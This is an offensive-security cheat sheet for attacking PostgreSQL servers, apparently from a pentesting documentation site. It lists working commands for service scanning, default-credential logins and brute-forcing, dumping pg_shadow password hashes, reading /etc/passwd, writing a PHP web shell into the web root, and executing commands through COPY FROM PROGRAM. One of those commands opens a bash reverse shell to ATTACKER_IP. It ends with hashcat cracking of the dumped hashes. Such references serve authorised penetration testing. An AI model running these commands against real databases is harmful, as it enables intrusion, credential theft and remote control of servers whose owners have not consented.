Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Service Detection
nmap -sV -sC -p 5432 TARGET
Connect
psql -h TARGET -U postgres
psql -h TARGET -U postgres -d database_name
psql "postgresql://postgres:password@TARGET/database"
Brute-Force
hydra -L users.txt -P passwords.txt postgres://TARGET
crackmapexec postgres TARGET -u postgres -p passwords.txt
postgres / postgres or blank.
Enumeration
SELECT version();
SELECT current_user;
SELECT usename, passwd FROM pg_shadow;
\l -- List databases
\dt -- List tables
\du -- List users/roles
SELECT * FROM pg_database;
File Read
SELECT pg_read_file('/etc/passwd');
SELECT pg_read_file('/etc/passwd', 0, 1000);
COPY
CREATE TABLE tmp(data text);
COPY tmp FROM '/etc/passwd';
SELECT * FROM tmp;
File Write
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';
Command Execution
COPY … FROM PROGRAM (PostgreSQL 9.3+)
CREATE TABLE cmd(output text);
COPY cmd FROM PROGRAM 'id';
SELECT * FROM cmd;
COPY cmd FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"';
Large Object
SELECT lo_import('/etc/passwd');
SELECT lo_export(OID, '/tmp/output');
Password Hashes
SELECT usename, passwd FROM pg_shadow;
hashcat -m 12 hash.txt /usr/share/wordlists/rockyou.txt
Extensions
RCE via Extension
If superuser:
CREATE OR REPLACE FUNCTION cmd(text) RETURNS void AS $$
BEGIN
EXECUTE 'COPY (SELECT '''') TO PROGRAM ''' || $1 || '''';
END;
$$ LANGUAGE plpgsql;
SELECT cmd('id');
NSE Scripts
nmap -p 5432 --script pgsql-brute TARGET
Quick Reference
| Check | Command |
|---|
| Connect | psql -h TARGET -U postgres |
| Read file | SELECT pg_read_file('/etc/passwd') |
| RCE | COPY cmd FROM PROGRAM 'id' |
| Write file | COPY (SELECT 'data') TO '/path/file' |
| Dump hashes | SELECT usename, passwd FROM pg_shadow |